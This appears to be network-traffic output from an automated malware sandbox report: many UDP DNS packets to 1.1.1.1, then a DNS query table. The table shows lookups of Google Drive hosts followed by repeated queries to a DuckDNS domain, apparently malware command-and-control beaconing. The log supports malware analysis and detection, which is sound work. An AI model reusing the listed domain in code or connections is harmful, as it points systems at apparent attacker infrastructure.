Jul 5, 2024 07:28:00.203062057 CEST	58718	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:00.323390961 CEST	53	58718	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:02.443226099 CEST	61329	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:02.594849110 CEST	53	61329	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:04.450004101 CEST	56821	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:04.570066929 CEST	53	56821	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:04.590970993 CEST	62219	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:04.711505890 CEST	53	62219	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:06.325480938 CEST	64918	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:06.445421934 CEST	53	64918	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:07.825994968 CEST	54210	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:07.946129084 CEST	53	54210	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:09.177014112 CEST	55668	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:09.296989918 CEST	53	55668	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:09.298749924 CEST	50653	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:09.419917107 CEST	53	50653	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:10.472661018 CEST	52603	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:10.593676090 CEST	53	52603	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:11.535684109 CEST	51742	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:11.656068087 CEST	53	51742	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:12.477794886 CEST	59547	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:12.598097086 CEST	53	59547	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:13.289719105 CEST	54247	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:13.410137892 CEST	53	54247	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:17.414041996 CEST	52904	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:17.535032034 CEST	53	52904	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:17.535738945 CEST	52787	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:17.655632973 CEST	53	52787	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:21.662921906 CEST	53675	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:21.786946058 CEST	53	53675	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:25.802687883 CEST	49765	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:25.923883915 CEST	53	49765	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:25.924593925 CEST	50551	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:26.045021057 CEST	53	50551	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:30.051711082 CEST	56553	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:30.203943014 CEST	53	56553	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:34.207081079 CEST	56401	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:34.363583088 CEST	53	56401	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:34.364288092 CEST	58766	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:34.496424913 CEST	53	58766	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:38.502978086 CEST	57328	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:38.633492947 CEST	53	57328	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:42.642749071 CEST	63677	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:42.762197971 CEST	53	63677	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:42.762733936 CEST	54508	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:42.883127928 CEST	53	54508	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:46.891971111 CEST	65384	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:47.011396885 CEST	53	65384	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:51.016226053 CEST	59798	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:51.136075974 CEST	53	59798	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:51.136846066 CEST	63441	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:51.256442070 CEST	53	63441	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:55.264933109 CEST	50288	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:55.416440964 CEST	53	50288	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:55.417047024 CEST	50440	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:55.544126034 CEST	53	50440	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:59.560934067 CEST	63396	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:59.681596994 CEST	53	63396	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:03.684997082 CEST	58208	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:03.805919886 CEST	53	58208	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:03.806469917 CEST	49552	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:03.926783085 CEST	53	49552	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:07.934043884 CEST	64153	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:08.053611040 CEST	53	64153	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:12.058307886 CEST	63927	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:12.178666115 CEST	53	63927	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:12.179800034 CEST	53003	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:12.299942017 CEST	53	53003	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:16.307224035 CEST	55506	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:16.428664923 CEST	53	55506	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:16.429347038 CEST	64345	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:16.549546957 CEST	53	64345	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:20.556267977 CEST	53088	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:20.676075935 CEST	53	53088	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:24.680347919 CEST	65127	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:24.800678968 CEST	53	65127	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:24.801280975 CEST	64445	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:24.934277058 CEST	53	64445	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:28.945240974 CEST	61279	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:29.064656973 CEST	53	61279	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:33.069128990 CEST	61693	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:33.190165043 CEST	53	61693	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:33.191046953 CEST	65385	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:33.310931921 CEST	53	65385	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:37.318317890 CEST	56502	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:37.438183069 CEST	53	56502	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:37.438713074 CEST	51022	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:37.571479082 CEST	53	51022	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:41.583283901 CEST	50134	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:41.703103065 CEST	53	50134	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:45.707156897 CEST	64071	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:45.827409029 CEST	53	64071	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:45.828180075 CEST	59714	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:45.948152065 CEST	53	59714	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:49.956351042 CEST	63931	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:50.076303959 CEST	53	63931	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:54.080549955 CEST	51881	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:54.200476885 CEST	53	51881	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:54.201030970 CEST	56628	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:54.320892096 CEST	53	56628	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:58.329286098 CEST	65183	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:58.449384928 CEST	53	65183	1.1.1.1	192.168.11.20
Jul 5, 2024 07:29:58.450031996 CEST	59803	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:29:58.570199013 CEST	53	59803	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:02.578596115 CEST	55508	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:02.699516058 CEST	53	55508	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:06.702465057 CEST	49824	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:06.827464104 CEST	53	49824	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:06.828092098 CEST	65452	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:06.948215008 CEST	53	65452	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:10.951648951 CEST	61204	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:11.071708918 CEST	53	61204	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:15.075824022 CEST	65278	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:15.196222067 CEST	53	65278	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:15.196923971 CEST	55754	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:15.317101955 CEST	53	55754	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:19.324716091 CEST	54113	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:19.466778040 CEST	53	54113	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:19.467308998 CEST	62047	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:19.590540886 CEST	53	62047	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:23.605125904 CEST	57958	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:23.725225925 CEST	53	57958	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:27.731312990 CEST	52325	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:27.851479053 CEST	53	52325	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:27.852046013 CEST	64923	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:27.972261906 CEST	53	64923	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:31.978163958 CEST	56810	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:32.098470926 CEST	53	56810	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:36.102248907 CEST	51157	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:36.222517967 CEST	53	51157	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:36.223138094 CEST	60249	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:36.342986107 CEST	53	60249	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:40.351392031 CEST	56561	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:40.471065998 CEST	53	56561	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:40.471816063 CEST	60800	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:40.591197014 CEST	53	60800	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:44.600617886 CEST	62924	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:44.721093893 CEST	53	62924	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:48.724997997 CEST	56650	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:48.845314026 CEST	53	56650	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:48.845848083 CEST	50697	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:48.965588093 CEST	53	50697	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:52.973571062 CEST	62270	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:53.093472004 CEST	53	62270	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:57.097762108 CEST	60190	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:57.217433929 CEST	53	60190	1.1.1.1	192.168.11.20
Jul 5, 2024 07:30:57.218034983 CEST	53566	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:30:57.338304043 CEST	53	53566	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:01.346761942 CEST	62828	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:01.466403961 CEST	53	62828	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:01.467026949 CEST	65067	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:01.587946892 CEST	53	65067	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:05.595834970 CEST	54425	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:05.715325117 CEST	53	54425	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:09.719978094 CEST	57112	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:09.870480061 CEST	53	57112	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:09.871073008 CEST	52973	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:09.991816998 CEST	53	52973	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:14.000277996 CEST	54770	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:14.121352911 CEST	53	54770	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:18.124366045 CEST	56673	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:18.245685101 CEST	53	56673	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:18.247915983 CEST	54181	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:18.368042946 CEST	53	54181	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:22.373657942 CEST	53753	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:22.493402958 CEST	53	53753	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:26.497694969 CEST	60791	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:26.625016928 CEST	53	60791	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:26.625643015 CEST	63000	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:26.753420115 CEST	53	63000	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:30.762202978 CEST	58528	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:30.881975889 CEST	53	58528	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:34.886457920 CEST	65232	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:35.006261110 CEST	53	65232	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:35.007153988 CEST	61432	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:35.127574921 CEST	53	61432	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:39.135469913 CEST	64295	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:39.255625963 CEST	53	64295	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:39.258922100 CEST	63735	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:39.379748106 CEST	53	63735	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:43.384486914 CEST	58664	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:43.504460096 CEST	53	58664	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:47.508517027 CEST	50320	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:47.628042936 CEST	53	50320	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:47.628586054 CEST	64005	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:47.749085903 CEST	53	64005	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:51.757656097 CEST	61382	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:51.884645939 CEST	53	61382	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:55.897947073 CEST	57894	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:56.022974014 CEST	53	57894	1.1.1.1	192.168.11.20
Jul 5, 2024 07:31:56.023582935 CEST	54245	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:31:56.144224882 CEST	53	54245	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:00.146457911 CEST	65069	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:00.266102076 CEST	53	65069	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:00.266660929 CEST	57636	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:00.387382984 CEST	53	57636	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:04.395394087 CEST	64987	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:04.514986992 CEST	53	64987	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:08.519547939 CEST	53253	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:08.639142036 CEST	53	53253	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:08.639723063 CEST	64726	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:08.759867907 CEST	53	64726	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:12.768580914 CEST	62369	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:12.893454075 CEST	53	62369	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:16.908322096 CEST	64209	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:17.027951956 CEST	53	64209	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:17.028665066 CEST	52835	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:17.149874926 CEST	53	52835	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:21.157521009 CEST	56687	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:21.288794041 CEST	53	56687	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:21.289329052 CEST	65055	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:21.408771038 CEST	53	65055	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:25.422256947 CEST	61563	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:25.561734915 CEST	53	61563	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:29.577725887 CEST	62614	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:29.699347973 CEST	53	62614	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:29.699894905 CEST	51021	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:29.820144892 CEST	53	51021	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:33.826432943 CEST	53525	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:33.945964098 CEST	53	53525	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:37.950609922 CEST	62794	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:38.070930004 CEST	53	62794	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:38.071526051 CEST	63872	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:38.191984892 CEST	53	63872	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:42.199660063 CEST	57658	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:42.320624113 CEST	53	57658	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:42.321212053 CEST	60406	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:42.443253994 CEST	53	60406	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:46.448812008 CEST	59361	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:46.568366051 CEST	53	59361	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:50.572812080 CEST	52599	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:50.693263054 CEST	53	52599	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:50.693963051 CEST	51672	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:50.814826965 CEST	53	51672	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:54.821876049 CEST	59985	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:54.942631006 CEST	53	59985	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:58.946048975 CEST	50797	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:59.066215992 CEST	53	50797	1.1.1.1	192.168.11.20
Jul 5, 2024 07:32:59.067179918 CEST	55402	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:32:59.186934948 CEST	53	55402	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:03.195039988 CEST	54277	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:03.314929008 CEST	53	54277	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:03.315498114 CEST	59860	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:03.435060024 CEST	53	59860	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:07.444237947 CEST	51534	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:07.571460009 CEST	53	51534	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:11.584048033 CEST	63372	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:11.704462051 CEST	53	63372	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:11.705209970 CEST	52269	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:11.824981928 CEST	53	52269	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:15.833075047 CEST	59808	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:15.953139067 CEST	53	59808	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:19.959687948 CEST	56567	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:20.079240084 CEST	53	56567	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:20.079838037 CEST	65159	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:20.200072050 CEST	53	65159	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:24.206208944 CEST	57022	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:24.330147028 CEST	53	57022	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:24.330660105 CEST	64779	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:24.473052979 CEST	53	64779	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:28.486810923 CEST	56205	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:28.606885910 CEST	53	56205	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:32.610466957 CEST	60505	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:32.730272055 CEST	53	60505	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:32.730817080 CEST	62659	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:32.850589037 CEST	53	62659	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:41.577270031 CEST	61543	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:41.698071957 CEST	53	61543	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:41.698573112 CEST	52242	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:41.824421883 CEST	53	52242	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:45.826467991 CEST	63353	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:45.946624994 CEST	53	63353	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:49.950337887 CEST	61319	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:50.070390940 CEST	53	61319	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:50.071043015 CEST	58387	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:50.191128969 CEST	53	58387	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:54.199400902 CEST	64346	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:54.323664904 CEST	53	64346	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:54.324243069 CEST	54336	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:54.444036961 CEST	53	54336	1.1.1.1	192.168.11.20
Jul 5, 2024 07:33:58.448565006 CEST	59934	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:33:58.568097115 CEST	53	59934	1.1.1.1	192.168.11.20
Jul 5, 2024 07:34:02.572613955 CEST	60213	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:34:02.692255020 CEST	53	60213	1.1.1.1	192.168.11.20
Jul 5, 2024 07:34:02.692707062 CEST	53933	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:34:02.813441038 CEST	53	53933	1.1.1.1	192.168.11.20
Jul 5, 2024 07:34:06.821726084 CEST	62878	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:34:06.941401958 CEST	53	62878	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 5, 2024 07:26:11.574145079 CEST	192.168.11.20	1.1.1.1	0xbee0	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:12.232944965 CEST	192.168.11.20	1.1.1.1	0x2f6a	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:14.761617899 CEST	192.168.11.20	1.1.1.1	0x381b	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:14.942125082 CEST	192.168.11.20	1.1.1.1	0x6ac5	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:19.111713886 CEST	192.168.11.20	1.1.1.1	0xbd38	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:19.764436007 CEST	192.168.11.20	1.1.1.1	0x3c9a	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:23.891860962 CEST	192.168.11.20	1.1.1.1	0x4f11	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:28.047240973 CEST	192.168.11.20	1.1.1.1	0x8008	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:28.198390961 CEST	192.168.11.20	1.1.1.1	0x99f6	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:32.358983040 CEST	192.168.11.20	1.1.1.1	0x8184	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:32.513267994 CEST	192.168.11.20	1.1.1.1	0x4da0	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:36.670463085 CEST	192.168.11.20	1.1.1.1	0xe47e	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:40.825817108 CEST	192.168.11.20	1.1.1.1	0x1519	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:40.979696035 CEST	192.168.11.20	1.1.1.1	0x4bb3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:45.138207912 CEST	192.168.11.20	1.1.1.1	0x1ee3	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:45.291476965 CEST	192.168.11.20	1.1.1.1	0xf550	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:49.417490005 CEST	192.168.11.20	1.1.1.1	0xb086	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:53.573075056 CEST	192.168.11.20	1.1.1.1	0x4c74	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:53.723932028 CEST	192.168.11.20	1.1.1.1	0x966d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:26:57.619803905 CEST	192.168.11.20	1.1.1.1	0xcf94	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:27:01.024384022 CEST	192.168.11.20	1.1.1.1	0x328d	Standard query (0)	7fxcmft-olcmjfjxdk.duckdns.org	A (IP address)	IN (0x0001)	false
